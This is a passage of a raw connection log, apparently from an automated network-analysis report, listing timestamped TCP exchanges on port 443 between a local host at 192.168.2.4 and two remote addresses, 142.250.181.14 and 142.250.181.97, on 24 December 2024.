                                                                                                                                Dec 24, 2024 18:21:26.356832981 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.357079029 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.357153893 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.357696056 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.358443975 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.358449936 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.358788013 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.358908892 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.359175920 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.399360895 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.403359890 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.260485888 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.260570049 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.260579109 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.260626078 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.260725975 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.260766983 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.260833979 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.261380911 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.261451006 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.261641026 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.261666059 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.261693001 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.261730909 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.261935949 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.261965036 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.261977911 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.261991978 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.265017986 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.265084028 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.265105009 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.265153885 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.265336037 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.265378952 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.265433073 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.265857935 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.265908003 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.265932083 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.265995979 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.266005039 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.266058922 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.266432047 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.266467094 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.266515017 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.266550064 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.953862906 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.953969955 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.955707073 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.955785990 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.956434965 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.956576109 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.957472086 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.957501888 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.957763910 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.957978964 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.959275961 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.960352898 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.960383892 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.960634947 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.960827112 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.961055040 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.961097002 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.961129904 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.961172104 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.961246967 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.966741085 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.966785908 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.966811895 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.966865063 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.967334986 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.967514038 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.968143940 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.968612909 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.968633890 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.969700098 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.971378088 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.993801117 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.003341913 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.003361940 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.011338949 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.039333105 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.870096922 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.870157003 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.870186090 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.870238066 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.870296001 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.870342970 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.870407104 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.870835066 CET50025443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.870867968 CET44350025142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.870938063 CET50025443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.871526003 CET50025443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.871541023 CET44350025142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.880539894 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.880604029 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.880616903 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.880652905 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.880773067 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.880861998 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.881000996 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.881328106 CET50026443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.881367922 CET44350026142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.881433964 CET50026443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.881658077 CET50026443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:29.881679058 CET44350026142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.883534908 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.883578062 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.883636951 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:29.883681059 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.883918047 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:29.884382010 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:29.884428024 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.884552956 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.884598017 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:29.884633064 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:29.884938955 CET50027443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:29.884974003 CET44350027142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:29.885075092 CET50027443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:29.885277987 CET50027443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:29.885294914 CET44350027142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.150284052 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.150408983 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.150448084 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:30.150470018 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.150639057 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:30.150646925 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.150847912 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.150882006 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:30.151139975 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:30.151468992 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:30.151487112 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.152645111 CET50028443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:30.152671099 CET44350028142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.153287888 CET50028443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:30.153287888 CET50028443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:30.153318882 CET44350028142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.349874020 CET50025443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:30.349915028 CET50026443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:30.349917889 CET50027443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:30.350028992 CET50028443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:30.351191998 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:30.351279974 CET44350029142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.351463079 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:30.351593018 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:30.351629019 CET44350030142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.352302074 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:30.352338076 CET44350029142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:30.352369070 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:30.352852106 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:30.352863073 CET44350030142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.043735027 CET44350029142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.043884993 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.044488907 CET44350029142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.044604063 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.048077106 CET44350030142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.048115969 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.048129082 CET44350029142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.048175097 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.048366070 CET44350029142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.048630953 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.048835039 CET44350030142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.048976898 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.049007893 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.050527096 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.050533056 CET44350030142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.050770044 CET44350030142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.053189039 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.053555965 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.095330000 CET44350030142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.095341921 CET44350029142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.956326008 CET44350029142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.956437111 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.956446886 CET44350029142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.956724882 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.956724882 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.956779003 CET44350029142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.956938028 CET50029443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.957567930 CET50043443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:32.957638025 CET44350043142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.957797050 CET50043443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:32.957799911 CET50044443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.957868099 CET44350044142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.958251953 CET50043443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:32.958287001 CET44350043142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.958326101 CET50044443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.958439112 CET50044443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.958467007 CET44350044142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.961257935 CET44350030142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.965121031 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.965121031 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.965205908 CET44350030142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.965599060 CET44350030142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.965642929 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.965825081 CET50045443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:32.965825081 CET50030443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.965840101 CET44350045142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.966002941 CET50045443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:32.966274023 CET50046443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.966295004 CET50045443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:32.966299057 CET44350046142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.966315031 CET44350045142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:32.966430902 CET50046443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.966691017 CET50046443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:32.966713905 CET44350046142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:34.365529060 CET50043443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:34.365607023 CET50045443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:34.365607977 CET50044443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:34.365607977 CET50046443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:34.370420933 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:34.370426893 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:34.370460987 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:34.370462894 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:34.371330023 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:34.371336937 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:34.371864080 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:34.371864080 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:34.371876001 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:34.371876955 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.063688993 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.063807011 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.064291954 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.064383984 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.064479113 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.064667940 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.065361977 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.065473080 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.072568893 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.072583914 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.072799921 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.072901964 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.073448896 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.074856997 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.074881077 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.075191021 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.075270891 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.075795889 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.119333982 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.123333931 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.967904091 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.968384981 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.968410969 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.968595982 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.968966961 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.969012022 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.969082117 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.973421097 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.973746061 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.973762989 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.973942995 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.977322102 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.977374077 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.981111050 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.982642889 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.982657909 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.983442068 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.983501911 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.983793974 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.984385967 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.984405994 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.984421968 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.984421968 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.985351086 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.985368967 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.985438108 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.987093925 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.987131119 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.987282991 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.988620043 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.988624096 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.988634109 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.988667965 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.988832951 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.989032030 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.989059925 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.989492893 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.989501953 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.673917055 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.674072027 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.674482107 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.674503088 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.676434994 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.676450014 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.683161974 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.683389902 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.684649944 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.684667110 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.684843063 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.684855938 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.685985088 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.686060905 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.688242912 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.688642979 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.690819025 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.690829039 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.691061020 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.691186905 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.693094969 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.694397926 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.694421053 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.694849968 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.695034027 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.695599079 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.735368967 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.743347883 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.587686062 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.587765932 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.587831020 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.587924004 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.588073969 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.588129044 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.588179111 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.588597059 CET50074443192.168.2.4142.250.181.14
